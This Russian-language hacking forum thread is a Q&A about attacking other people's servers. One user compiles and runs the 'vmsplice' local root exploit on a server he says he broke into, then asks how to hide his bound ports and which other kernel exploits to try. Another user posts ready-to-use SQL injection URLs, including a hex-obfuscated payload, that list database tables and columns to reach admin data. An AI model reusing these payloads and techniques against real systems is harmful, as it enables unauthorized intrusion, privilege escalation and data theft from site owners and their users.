Ваши вопросы по уязвимостям.

Забиндил порт на сервере,приконектился через пути,всё ровно,НО:
Вывод результата раскидан по всей консоли. С чем это связано?

 

При нажатие на старт брут - появляется на 1 секунду CMD и сразу пропадает, при повторном нажатие ничего не стается.
Или надо батники делать?

 

подключись с помощью netcat

 

Хех,точно. Пасиб =)

 

HTML:

sh-3.1$ gcc 2.6.18.c -o expl  2.6.18.c:20:19: error: stdio.h: No such file or directory  2.6.18.c:21:19: error: errno.h: No such file or directory  2.6.18.c:22:20: error: stdlib.h: No such file or directory  2.6.18.c:23:20: error: string.h: No such file or directory  2.6.18.c:24:20: error: malloc.h: No such file or directory  In file included from /usr/lib/gcc/i486-linux-gnu/4.1.2/include/syslimits.h:7,                   from /usr/lib/gcc/i486-linux-gnu/4.1.2/include/limits.h:11,                   from 2.6.18.c:25:  /usr/lib/gcc/i486-linux-gnu/4.1.2/include/limits.h:122:61: error: limits.h: No s  uch file or directory  2.6.18.c:26:20: error: signal.h: No such file or directory  2.6.18.c:27:20: error: unistd.h: No such file or directory  2.6.18.c:28:21: error: sys/uio.h: No such file or directory  2.6.18.c:29:22: error: sys/mman.h: No such file or directory  2.6.18.c: In function 'die':  2.6.18.c:55: warning: incompatible implicit declaration of built-in function 'pr  intf'  2.6.18.c:56: error: 'stdout' undeclared (first use in this function)  2.6.18.c:56: error: (Each undeclared identifier is reported only once  2.6.18.c:56: error: for each function it appears in.)  2.6.18.c:57: error: 'stderr' undeclared (first use in this function)  2.6.18.c:58: warning: incompatible implicit declaration of built-in function 'ex  it'  2.6.18.c: At top level:  2.6.18.c:143: warning: 'struct iovec' declared inside parameter list  2.6.18.c:143: warning: its scope is only this definition or declaration, which i  s probably not what you want  2.6.18.c: In function '_vmsplice':  2.6.18.c:143: error: 'errno' undeclared (first use in this function)  2.6.18.c: In function 'exit_code':  2.6.18.c:183: warning: incompatible implicit declaration of built-in function 'p  rintf'  2.6.18.c:185: warning: incompatible implicit declaration of built-in function 'e  xecl'  2.6.18.c:185: error: 'NULL' undeclared (first use in this function)  2.6.18.c:186: error: 'errno' undeclared (first use in this function)  2.6.18.c: In function 'main':  2.6.18.c:192: error: 'size_t' undeclared (first use in this function)  2.6.18.c:192: error: expected ';' before 'map_size'  2.6.18.c:194: error: storage size of 'iov' isn't known  2.6.18.c:202: warning: incompatible implicit declaration of built-in function 'p  rintf'  2.6.18.c:214: error: 'map_size' undeclared (first use in this function)  2.6.18.c:215: error: 'PROT_READ' undeclared (first use in this function)  2.6.18.c:215: error: 'PROT_WRITE' undeclared (first use in this function)  2.6.18.c:216: error: 'MAP_FIXED' undeclared (first use in this function)  2.6.18.c:216: error: 'MAP_PRIVATE' undeclared (first use in this function)  2.6.18.c:216: error: 'MAP_ANONYMOUS' undeclared (first use in this function)  2.6.18.c:216: warning: assignment makes pointer from integer without a cast  2.6.18.c:217: error: 'MAP_FAILED' undeclared (first use in this function)  2.6.18.c:218: error: 'errno' undeclared (first use in this function)  2.6.18.c:220: warning: incompatible implicit declaration of built-in function 'm  emset'  2.6.18.c:236: warning: assignment makes pointer from integer without a cast  2.6.18.c:254: warning: assignment makes pointer from integer without a cast  2.6.18.c:263: error: 'NULL' undeclared (first use in this function)  2.6.18.c:264: warning: assignment makes pointer from integer without a cast  2.6.18.c:283: error: 'SIGPIPE' undeclared (first use in this function)  2.6.18.c:287:2: warning: no newline at end of file  sh-3.1$

В чем проблема?

 

Нету библиотек.
Как вариант, найди их, положи в папку со сплойтом.
Затем в смлойте измени:
#include <liba.h>
на
#include "liba.h"

 

ВАрниант,но там помомо библиотек хватает ероров... не пояснишь их?

 

Парни сканером нашел уязвимость:
php html entity encoder heap overflow vulnerability, но нигде не могу найти инфу как ее юзать, кроме этого: http://www.securitylab.ru/vulnerability/276352.php. Но этого не достаточно, может кто нибудь помочь, поконкретней описать багу?

 

Половина эрроров из за отсутствия библиотек.
Видимо используються ф-я объявленная в той или иной библиотеке.

 

p.r0phe.t, что показывают команды

Code:

$ find / -name stdio.h

и/или

Code:

$ locate stdio.h

Возможно, они есть, но лежат по нестандартному пути. Если же не найдутся, придется компилить на другой тачке. А тянуть все хэдеры - это гемор

 

sh-3.1$ locate stdio.h
/usr/lib/gcc/i486-linux-gnu/4.1.2/include/ssp/stdio.h
/usr/lib/perl/5.8.8/CORE/nostdio.h

Компилирую на своём OpenSUSe не нашёл всего 1 библиотеку: asm/page.h. Вопрос: где скачать эту либу и куда ему закопировать?


P.S. Всё,разобрался. либу с поломанного серва слил,кому мож понадобится,либы хранятся в usr/include/

 

est takoy vapros..(izvinite 4to po ruskom ne napisu)

naprimer na sayte est injection (mysql ili sql) i ya nasel table name

http://www.xxx.com/news.php?iid=1+union+select+0,1,2,3,4+from+admin

a potom ya xo4u nayti columns name nu tut ne daet kakom 4isle columns name naprimer 2,3 a kak mojno ix uznat??

order+by ili kak??

 

RTFM!
Статей по скулям - тьма!

 

ne ponel

 

LokbatanLi
http://www.xxx.com/news.php?iid=1+union+select+table_name,1,2,3,4+from+information_schema.tables+limit+17,1
только в случае если весия ДБ 5, и если у тебя вывод под цифрой 0
дальше после того как узнал имя нужной табелки
http://www.xxx.com/news.php?iid=1+union+select+column_name,1,2,3,4+from+information_schema.columns+where+table_name='admin'+limit+0,1
имя табелки лучше перевести в SQL HEX
а еще лучше я думаю вот такой вот запрос сделать

http://www.xxx.com/news.php?iid=1+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(0xd187d0b8d182d0b0d0b920d181d182d0b0d182d0b5d0b9d0bad0b820d0bfd180d0be20d181d0bad183d0bbd0b8,(SELECT+CONCAT(TABLE_NAME,0x3a,TABLE_SCHEMA)+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+16,1),0x 0xd182d0b8d0bfd0be20687474703a2f2f666f72756d2e616e7469636861742e72752f7468726561643130343539312e68746d6c),0x71),0x71)

 

Все либы есть на хосте. Какой синтаксис для прописывания путей к ним? В си не шарю =(

 

p.r0phe.t
да кинь ты уже кому нить линк в пм!

 

К шелу линк? хм.
Мне для себя интересно поковыряться.
В общем разобрался,сплойт не проканал =(
sh-3.1$ ./expl
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e22000 .. 0xb7e54000
[-] vmsplice: Bad address

Снова есть вопрос
Как прикрыть забинденные мной порты? =)
И какой ещё сплойт под эту систему посоветуете
Linux yesclub 2.6.18-6-686

 

vi ne poneli menya

 

Для начала, воспользуйся сервисом http://www.translit.ru , дабы тебя можно было лучше понять. После этого или перефразируй свой вопрос, или же прочти вот эту статью . Мне кажется, после прочтения (возможно, первого) многие вопросы отпадут сами собой. Удачи! =)